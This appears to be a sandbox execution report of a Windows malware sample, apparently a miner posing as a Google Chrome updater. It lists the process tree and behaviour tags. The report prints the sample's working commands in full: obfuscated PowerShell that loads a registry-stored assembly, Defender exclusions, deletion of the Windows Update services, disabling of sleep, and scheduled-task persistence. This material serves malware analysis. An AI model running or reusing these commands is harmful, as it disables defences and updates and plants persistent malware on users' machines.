C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Detects videocard installed
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Checks processor information in registry
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Checks computer location settings
- Checks system information in the registry
- Enumerates system info in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Detects videocard installed
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 3516 -ip 35162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 4456 -ip 44562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4256 -ip 42562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 3828 -ip 38282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 1372 -ip 13722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 3980 -ip 39802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 4700 -ip 47002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 1232 -ip 12322⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4228 -ip 42282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 3596 -ip 35962⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 4120 -ip 41202⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4948 -ip 49482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4856 -ip 48562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 3372 -ip 33722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4944 -ip 49442⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 4716 -ip 47162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 636 -ip 6362⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 3408 -ip 34082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3028 -ip 30282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 1708 -ip 17082⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 4480 -ip 44802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 5012 -ip 50122⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3652 -ip 36522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 4780 -ip 47802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4564 -ip 45642⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 2588 -ip 25882⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 2276 -ip 22762⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 2264 -ip 22642⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 772 -ip 7722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 432 -ip 4322⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 2016 -ip 20162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 5116 -ip 51162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 2632 -ip 26322⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 5004 -ip 50042⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4792 -ip 47922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 224 -ip 2242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 1528 -ip 15282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 3520 -ip 35202⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 1036 -ip 10362⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4580 -ip 45802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 5116 -ip 51162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4868 -ip 48682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 848 -ip 8482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 4824 -ip 48242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 2872 -ip 28722⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 2044 -ip 20442⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4208 -ip 42082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 2460 -ip 24602⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 3700 -ip 37002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 3060 -ip 30602⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 1784 -ip 17842⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 1956 -ip 19562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 4812 -ip 48122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 2640 -ip 26402⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 2968 -ip 29682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 4804 -ip 48042⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 5116 -ip 51162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 5012 -ip 50122⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 2412 -ip 24122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3816 -ip 38162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 2328 -ip 23282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4192 -ip 41922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4968 -ip 49682⤵
-
